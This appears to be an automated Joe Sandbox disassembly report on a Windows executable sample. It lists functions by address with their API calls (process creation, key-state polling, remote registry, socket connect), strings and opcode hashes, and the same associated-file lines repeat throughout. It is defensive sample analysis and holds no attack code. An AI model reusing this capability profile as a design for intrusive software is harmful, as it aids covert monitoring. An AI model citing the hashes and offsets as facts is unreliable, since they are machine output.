Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 0e863479b16c5b18aead1394aa46db6b99ed56ed4ab462866a7c6e8f1ba0d1fc
Instruction ID: 3f2c14f763be1bc9491f9a3c94b39e6a6fdc32e8a328795c95cef823b322e4a2
Opcode Fuzzy Hash: 0e863479b16c5b18aead1394aa46db6b99ed56ed4ab462866a7c6e8f1ba0d1fc
Instruction Fuzzy Hash: 5C218635A00108EFDB10EF65D985D9EBBB8EF89704B10407EF505E7291DB74EA41CB65

Function 0043C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0043C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0043C84A
Part of subcall function 0043C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043C85D
Part of subcall function 0043C82D: GetCurrentThreadId.KERNEL32 ref: 0043C864
Part of subcall function 0043C82D: AttachThreadInput.USER32(00000000), ref: 0043C86B

GetFocus.USER32 ref: 0043CA05

Part of subcall function 0043C876: GetParent.USER32(?), ref: 0043C884

GetClassNameW.USER32(?,?,00000100), ref: 0043CA4E
EnumChildWindows.USER32(?,0043CAC4), ref: 0043CA76
__swprintf.LIBCMT ref: 0043CA90

Strings

%s%d, xrefs: 0043CA8A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 27703f750c254b8df19cde0fe7a16eb874166500f6a25c600e85877b7e532df2
Instruction ID: 829f495f47ef218ad7d12fc0482335a0f9b2c0f30f702a8be16dcec9d61f0c8a
Opcode Fuzzy Hash: 27703f750c254b8df19cde0fe7a16eb874166500f6a25c600e85877b7e532df2
Instruction Fuzzy Hash: 8A1172716002096BCF15BF619CC5FAA3778AF49718F00907BFA09BA182DB789645DB78

Function 00427A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00427AD8

Part of subcall function 00427CF4: __mtinitlocknum.LIBCMT ref: 00427D06
Part of subcall function 00427CF4: RtlEnterCriticalSection.KERNEL32(00000000,?,00427ADD,0000000D), ref: 00427D1F

InterlockedIncrement.KERNEL32(?), ref: 00427AE5
__lock.LIBCMT ref: 00427AF9
___addlocaleref.LIBCMT ref: 00427B17

Strings

`H, xrefs: 00427AA3

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID: `H
API String ID: 1687444384-912421188
Opcode ID: 9c391c81e9dda691e28eee64fa7d0ba00185fd93005869b510abeebd1aa148ee
Instruction ID: 1797e7fad8e162582fd59431b3014d95c8bf93bc8725d16659cd3889e7a519e1
Opcode Fuzzy Hash: 9c391c81e9dda691e28eee64fa7d0ba00185fd93005869b510abeebd1aa148ee
Instruction Fuzzy Hash: 1D016171604710DFD720DF76E90574ABBF0AF50329F60890FA496972A0CBB8A644CB59

Function 0046E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046E33D
_memset.LIBCMT ref: 0046E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C3D00,004C3D44), ref: 0046E37B
CloseHandle.KERNEL32 ref: 0046E38D

Strings

D=L, xrefs: 0046E346

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=L
API String ID: 3277943733-2639313163
Opcode ID: 9cdb3eb17ab4b92b591a418dd0827165d4bfee49c7ed39e47b44089da6596004
Instruction ID: 1dc04ddbbd56b6e1bfcd3b76fe9272b6450bf468c53a2e9cb482092a9c0dbf5b
Opcode Fuzzy Hash: 9cdb3eb17ab4b92b591a418dd0827165d4bfee49c7ed39e47b44089da6596004
Instruction Fuzzy Hash: 20F0BEF0601310BAE2502F61BC05FBB3EACDB04756F008436BE0AD61A2D3799E0087AC

Function 00461945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004619F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00461A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00461B49
CloseHandle.KERNEL32(?), ref: 00461BBF

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 9282f24e6ff8530c23ddd74a7ce06cdb5885e117eb99833be6355047d1ea841d
Instruction ID: 2bdb186c9e029468b938e76092bf29530639fde0365ee340ce212a0d3725281c
Opcode Fuzzy Hash: 9282f24e6ff8530c23ddd74a7ce06cdb5885e117eb99833be6355047d1ea841d
Instruction Fuzzy Hash: 94816570600204ABDF10DF65C886BAEBBE5AF04714F18845EF905AF3D2E7B8A941CB95

Function 00441C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00441CB4
VariantClear.OLEAUT32(00000013), ref: 00441D26
VariantClear.OLEAUT32(00000000), ref: 00441D81
VariantClear.OLEAUT32(?), ref: 00441DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00441E26

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: c23e8023e6880c8b8df82b171dba115a25a693234c554f2165ca5545aaa9f89a
Instruction ID: 7786f43c6c60c0f1960bf112e7c66a9551d9e0e8f2c73cbc967b60c5b7ff2521
Opcode Fuzzy Hash: c23e8023e6880c8b8df82b171dba115a25a693234c554f2165ca5545aaa9f89a
Instruction Fuzzy Hash: BE5179B5A00209AFDB10CF58C880AAAB7B9FF4C314B15855AED59DB350D334EA41CFA4

Function 00460688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004606EE
GetProcAddress.KERNEL32(00000000,?), ref: 0046077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 0046079B
GetProcAddress.KERNEL32(00000000,?), ref: 004607E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 004607FB

Part of subcall function 0041E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0044A574,?,?,00000000,00000008), ref: 0041E675
Part of subcall function 0041E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0044A574,?,?,00000000,00000008), ref: 0041E699

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 7e974794b9ebcf7644e118669091014843e614acbdd884541301673f92c5cb14
Instruction ID: 87febcb3e1d6037208c0937028248e6385403b15d7085c17ee78e3048b04f42a
Opcode Fuzzy Hash: 7e974794b9ebcf7644e118669091014843e614acbdd884541301673f92c5cb14
Instruction Fuzzy Hash: F1516E75A00205DFCB04EFA9C485DAEB7B5BF18314B04806AE905AB391EB38ED45CF89

Function 00462E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00462EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00462F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00462F75
RegCloseKey.ADVAPI32(?,?), ref: 00462FA1
RegCloseKey.ADVAPI32(00000000), ref: 00462FAE

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: c8515245b16fd5d09797e9a9146549c76df087fdde7285a1590f81fa609b5e39
Instruction ID: f2e41662885f165f18e384d2a40cd3da89a2193350d58dfc2c6ca3ce7a760dd9
Opcode Fuzzy Hash: c8515245b16fd5d09797e9a9146549c76df087fdde7285a1590f81fa609b5e39
Instruction Fuzzy Hash: 48518B71608204AFD704EF64C981E6BB7F8FF88308F00492EF59597291EB78E905DB5A

Function 0046CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7ec6fe09be3078d1c893fdcf3f2ff488aa178df2834385e2e392a1983d3a020
Instruction ID: 09529bc7e3110235e9e6e45ecf7d8fa4ad648c899c66dbd7154b48755ec01ae1
Opcode Fuzzy Hash: a7ec6fe09be3078d1c893fdcf3f2ff488aa178df2834385e2e392a1983d3a020
Instruction Fuzzy Hash: CA41B339E01104ABD714DF68CC84FBABB74EB09310F140236E999A72E1E739AD11969A

Function 00451206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004512B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004512DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0045131C

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00451341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00451349

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 745e8af2c8a30260d11a2f139f3fe93f5d4de3b0e529c75e1797880a93a2b48e
Instruction ID: 710539193e7f1d8fb549b37adceebc83b926d8c979f1569505f486b0f8da61be
Opcode Fuzzy Hash: 745e8af2c8a30260d11a2f139f3fe93f5d4de3b0e529c75e1797880a93a2b48e
Instruction Fuzzy Hash: 0F414C35A00105DFDB01EF65C981AAEBBF5FF08314B1480AAE946AB3A2DB35ED01DF54

Function 0041B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0041B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0041B66C
GetAsyncKeyState.USER32(00000001), ref: 0041B691
GetAsyncKeyState.USER32(00000002), ref: 0041B69F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 43b026e8ddf3c15877f3b5ba52f636104edfffe8d0463ba332f451902e7bfc12
Instruction ID: 56377a556ccba115ed564bfe001a2c8afbd6a1a20169098259664232e43cb080
Opcode Fuzzy Hash: 43b026e8ddf3c15877f3b5ba52f636104edfffe8d0463ba332f451902e7bfc12
Instruction Fuzzy Hash: 3A417E31A04119BBCF159F65C844AEEBB74FF15324F10831BF82996290C739AD90DB9A

Function 0043B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0043B369
PostMessageW.USER32(?,00000201,00000001), ref: 0043B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0043B41B
PostMessageW.USER32(?,00000202,00000000), ref: 0043B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0043B431

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: d17ea4044e2045b9c16e98e0df8e21c289d5939ccdd835b3e45b18eb1401e770
Instruction ID: e5f01e0ccbb0feccb883e1297f79fe71a552ab19b66adbfd7133fe0b7bbb2f95
Opcode Fuzzy Hash: d17ea4044e2045b9c16e98e0df8e21c289d5939ccdd835b3e45b18eb1401e770
Instruction Fuzzy Hash: 5731AE7190022DEBDF04CF68DD4DB9E7BB5EB08319F10462AFA21AA2D1C3B49954CB95

Function 0043DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0043DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0043DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0043DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0043DC52
_wcsstr.LIBCMT ref: 0043DC5C

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: a794f66c915fbd57c4909ec50b061da08dbf62a82d0dd86a98add32000dcff59
Instruction ID: 22629a0e4b8d2ceb4bff886f9726b3e533dde48c58e468b86331f4b7c5adb18c
Opcode Fuzzy Hash: a794f66c915fbd57c4909ec50b061da08dbf62a82d0dd86a98add32000dcff59
Instruction Fuzzy Hash: A2213771A04104BBEB155B39AC49E7F7BA8DF49710F10903FF809DA191EAA9DC41D3A8

Function 0043BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0043BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0043BCC2
__itow.LIBCMT ref: 0043BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0043BD00
__itow.LIBCMT ref: 0043BD11

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: db692809dc60a942853b210d65d93de4cfde56d02dc74aab5678215f32d867fe
Instruction ID: 3ff0eca8595b0e8cc932446e134a016a3cae24b5f552021415e5118c315c07d1
Opcode Fuzzy Hash: db692809dc60a942853b210d65d93de4cfde56d02dc74aab5678215f32d867fe
Instruction Fuzzy Hash: 9021D731B002187ADB20AA659C45FDF7B68EF4D354F10203EFA06EB1C1EB78894587E9

Function 00446318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 004050E6: _wcsncpy.LIBCMT ref: 004050FA

GetFileAttributesW.KERNEL32(?,?,?,?,004460C3), ref: 00446369
GetLastError.KERNEL32(?,?,?,004460C3), ref: 00446374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004460C3), ref: 00446388
_wcsrchr.LIBCMT ref: 004463AA

Part of subcall function 00446318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004460C3), ref: 004463E0

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: eec144002fa54551e57bd01bd666ecf60c0fb7f6026f1ee6ff66481aa4da2889
Instruction ID: e2e5c400610b8dad56117f9b5beb12c84386859fb76420c5d936f92795e9889b
Opcode Fuzzy Hash: eec144002fa54551e57bd01bd666ecf60c0fb7f6026f1ee6ff66481aa4da2889
Instruction Fuzzy Hash: 6B212630A042145AFB24AE74AC42FEF23ACAF06360F11047FF805C31C1EB6899858A5E

Function 00458B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0045A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00458BD3
WSAGetLastError.WSOCK32(00000000), ref: 00458BE2
connect.WSOCK32(00000000,?,00000010), ref: 00458BFE

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 822bd67af5b21315d4a58d27a51d58b89f2d7ba38396fa916d0a561f55ec1a63
Instruction ID: abb2c2ea28d5de88bdee0dc417e74f9f20a9303d66739d36d785107e4a3282d2
Opcode Fuzzy Hash: 822bd67af5b21315d4a58d27a51d58b89f2d7ba38396fa916d0a561f55ec1a63
Instruction Fuzzy Hash: 5C21DE316002009FCB10AF28C885B7E73A9AF48714F04446EF902AB3D2CF78AC058B69

Function 00458420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00458441
GetForegroundWindow.USER32 ref: 00458458
GetDC.USER32(00000000), ref: 00458494
GetPixel.GDI32(00000000,?,00000003), ref: 004584A0
ReleaseDC.USER32(00000000,00000003), ref: 004584DB

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 932ca161dc75b4b717c601e34a63d21e2026fc438652b47232b146da7129521a
Instruction ID: 8a1256e0aecdf14aa6c4f4beab4c2806aa620a91b813a528773de1c84d1aad7c
Opcode Fuzzy Hash: 932ca161dc75b4b717c601e34a63d21e2026fc438652b47232b146da7129521a
Instruction Fuzzy Hash: 7E21A735A00204AFD700EFA5C945A5EB7E5EF48305F04887DEC49A7252DF74EC04CB54

Function 0041AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041AFE3
SelectObject.GDI32(?,00000000), ref: 0041AFF2
BeginPath.GDI32(?), ref: 0041B009
